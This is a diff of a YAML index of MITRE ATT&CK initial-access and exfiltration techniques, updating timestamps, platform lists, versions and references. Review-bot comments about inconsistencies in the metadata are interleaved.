description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
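Review bot: the `url` swap to a `web.archive.org/web/20210708014107/` snapshot leaves the `description` two lines above still reading `Retrieved October 19, 2020.`, while the snapshot is dated 2021-07-08. If this entry mirrors upstream ATT&CK verbatim the mismatch is theirs and should stay as-is; if the archive URL was chosen here, the retrieved date should reflect the snapshot that was actually checked. The identical `ACSC Email Spoofing` entry is changed the same way under T1566.001 and T1566 later in the patch, so whichever way this is resolved should be applied to all three.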
@@ -59074,12 +60003,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59141,7 +60069,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -59158,7 +60086,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -59188,7 +60115,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
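Review bot: the `modified` timestamp for T1195.003 moves backwards, from `2022-05-24T14:00:00.188Z` to `2022-04-28T16:05:10.755Z`, and a reviewer reading this as a refresh would expect it to move forward. The same rewind appears for T1195.002 (`2022-05-24` to `2022-04-28`), T1200 (`2023-05-09` to `2023-03-30`), T1029 and T1048.001 (`2021-04-29` to `2020-03-28`), T1011.001 (`2022-05-11` to `2022-03-08`) and T1048.002 (`2022-04-25` to `2021-10-15`). Every old value shares the `14:00:00.188Z` / `14:49:39.188Z` shape, which looks like a bulk-stamped value rather than a real edit, so the new dates are plausibly the genuine upstream ones; please say so in the commit message and name the upstream bundle version the index was regenerated from, so nobody reads these as lost edits.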
@@ -59202,7 +60129,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59265,12 +60191,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59345,7 +60270,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59359,19 +60284,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59397,7 +60321,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59452,7 +60376,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59515,11 +60438,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59534,6 +60456,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -59542,18 +60465,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59585,14 +60508,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
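Review bot: the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines removed at the end of T1078.001 here are the same values that were inserted higher up in the same object in the `@@ -59534` and `@@ -59542` hunks, so for those two keys this is a reorder, not a content change; the only real changes to T1078.001 are the platform rename and the `1.3` to `1.4` version bump. T1199, T1078 and T1078.004 show the same shuffle in later hunks. If the generator can emit keys in a stable order (sorted, or preserving upstream order), the next regeneration diff will show only real changes.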
@@ -59603,6 +60523,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59611,22 +60536,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -59651,36 +60572,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
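Review bot: the substantive change in the T1566 description is one added clause (the "thread hijacking" sentence, with the period before `(Citation: cyberproof-double-bounce)` becoming a comma), but the switch from a double-quoted scalar to a `|-` literal block makes all 22 lines show as removed and re-added. Other descriptions in this same patch (T1566.001, T1195, T1189, T1078.004, T1566.003) stay double-quoted, so the style is not being normalised file-wide; if the generator can keep the scalar style stable, future description edits will be reviewable line by line. The new `(Citation: phishing-krebs)` does resolve: a matching `source_name: phishing-krebs` entry is added in the `@@ -59729` hunk below.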
@@ -59709,9 +60613,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -59729,7 +60633,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
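Review bot: the new `phishing-krebs` entry formats the author as `Brian Krebs.`, whereas the other person-authored references visible in this patch use surname-first form (`Falcone, R., et al.` under T1566.001, `Gardiner, J., Cova, M., Nagaraja, S.` under T1048.001). If the entry is copied verbatim from upstream ATT&CK, leave it; if it was authored here, `Krebs, B. (2024, March 28). ...` would match the surrounding convention. The two-line single-quoted `description` is valid YAML as written.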
@@ -59767,11 +60675,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59788,7 +60695,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -59798,7 +60704,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59807,19 +60713,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59867,11 +60771,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59891,10 +60796,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
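Review bot: T1566.004 loses `SaaS` together with `Office 365` and `Google Workspace` and gains only `Identity Provider`, while its sibling T1566.002 (`@@ -59015`) and parent T1566 (`@@ -59709`) keep `SaaS` and gain both `Identity Provider` and `Office Suite`; T1189 (`@@ -60186`) likewise trades `SaaS` for `Identity Provider`. Dropping a platform is a different kind of change from renaming one, so please confirm this list matches the upstream bundle rather than a rename script that handled the three-item list differently from the four-item ones.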
@@ -59927,7 +60830,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -59966,7 +60868,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59981,7 +60883,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -60061,11 +60962,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60121,11 +61021,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -60186,8 +61085,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -60215,13 +61114,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60261,8 +61159,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60270,13 +61170,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60307,14 +61207,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60381,11 +61278,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60437,15 +61333,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60469,10 +61364,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60491,13 +61385,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60536,9 +61429,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60588,7 +61480,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60608,7 +61499,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60628,8 +61519,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
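Review bot: T1029 loses `x_mitre_attack_spec_version: 2.1.0` outright here, with nothing added in its place, whereas other objects in this patch either keep the key (T1195.003 and T1195.002 retain `2.1.0`) or bump it to `3.2.0` (T1199, T1078, T1189, T1078.003, T1567, T1020.001). T1011.001 (`@@ -60718`) and T1048.001 (`@@ -60833`) are stripped the same way. After this patch some techniques carry no attack-spec version at all, so any tooling that reads `x_mitre_attack_spec_version` unconditionally needs to tolerate its absence, and the commit message should note that the key is now optional.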
@@ -60676,7 +61565,6 @@ exfiltration:
